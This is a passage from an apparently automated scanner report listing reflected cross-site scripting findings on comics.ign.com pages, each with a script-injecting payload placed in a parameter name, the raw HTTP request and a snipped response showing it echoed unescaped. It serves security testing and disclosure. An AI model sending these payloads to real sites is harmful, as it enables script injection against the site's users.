The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7f6"-alert(1)-"8e609d735dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-760949571-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211700v-1n-12mc+1297041211700mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 136251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/characters.html?3c7f6"-alert(1)-"8e609d735dc=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.113. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/comicseries.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00c"><script>alert(1)</script>3d074d6432d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/comicseries.html?de00c"><script>alert(1)</script>3d074d6432d=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:01 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1908380328-11;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:01 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041181719v-1n-12mc+1297041181719mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/comicseries.html?de00c"><script>alert(1)</script>3d074d6432d=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.114. http://comics.ign.com/index/comicseries.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/comicseries.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6dd"-alert(1)-"0e8b7d8f901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/comicseries.html?8e6dd"-alert(1)-"0e8b7d8f901=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:04 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-380005497-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:04 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041184031v-1n-12mc+1297041184031mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 6406

<!-- stitial !-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
'') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://comics.ign.com/index/comicseries.html?8e6dd"-alert(1)-"0e8b7d8f901=1";
return true;
   
   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.115. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5591"-alert(1)-"85de685ec3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?a5591"-alert(1)-"85de685ec3c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1554243470-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211663v-1n-12mc+1297041211663mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/features.html?a5591"-alert(1)-"85de685ec3c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.116. http://comics.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3494"><script>alert(1)</script>6da4e1145d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?a3494"><script>alert(1)</script>6da4e1145d3=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:29 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-185091644-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:29 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041209547v-1n-12mc+1297041209547mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/features.html?a3494"><script>alert(1)</script>6da4e1145d3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.117. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e12"><script>alert(1)</script>fd0dd69bb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:40 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-509284073-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041160394v-1n-12mc+1297041160394mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 205880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/latest-updates.html?26e12"><script>alert(1)</script>fd0dd69bb47=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.118. http://comics.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd844"-alert(1)-"532e0e503d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:43 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26296-1914995328-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041163126v-1n-12mc+1297041163126mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 205655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/latest-updates.html?dd844"-alert(1)-"532e0e503d7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.119. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f743c"-alert(1)-"59a7e92062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/news.html?f743c"-alert(1)-"59a7e92062=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:24 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-455367217-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041204767v-1n-12mc+1297041204767mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/news.html?f743c"-alert(1)-"59a7e92062=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.120. http://comics.ign.com/index/news.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/news.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45357"><script>alert(1)</script>80fbf9c206c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/news.html?45357"><script>alert(1)</script>80fbf9c206c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:20 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32462-337093650-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:20 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041200624v-1n-12mc+1297041200624mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 119564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/news.html?45357"><script>alert(1)</script>80fbf9c206c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.121. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/podcasts.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4eda"><script>alert(1)</script>568cecf0a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/podcasts.html?c4eda"><script>alert(1)</script>568cecf0a7f=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:32 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-78045477-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041212953v-1n-12mc+1297041212953mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/podcasts.html?c4eda"><script>alert(1)</script>568cecf0a7f=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.122. http://comics.ign.com/index/podcasts.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/podcasts.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc00"-alert(1)-"07446334699 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/podcasts.html?cdc00"-alert(1)-"07446334699=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:35 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-1065169981-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:35 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041215183v-1n-12mc+1297041215183mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/podcasts.html?cdc00"-alert(1)-"07446334699=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.123. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e29"-alert(1)-"3374167ff6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/previews.html?e5e29"-alert(1)-"3374167ff6c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:31 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-485-83747499-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:31 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041211111v-1n-12mc+1297041211111mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
f _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/index/previews.html?e5e29"-alert(1)-"3374167ff6c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.124. http://comics.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/previews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd37a"><script>alert(1)</script>ee03f7035cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/previews.html?dd37a"><script>alert(1)</script>ee03f7035cf=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:28 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-624763089-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:28 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041208386v-1n-12mc+1297041208386mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/previews.html?dd37a"><script>alert(1)</script>ee03f7035cf=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.125. http://comics.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a086"-alert(1)-"d310eae1459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/reviews.html?2a086"-alert(1)-"d310eae1459=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:25 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Content-Length: 6018
Set-Cookie: NGUserID=a016c04-12684-928941446-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041205321v-1n-12mc+1297041205321mv+1mn+12wwe~0;Path=/;Domain=.ign.com

<!-- stitial !-->
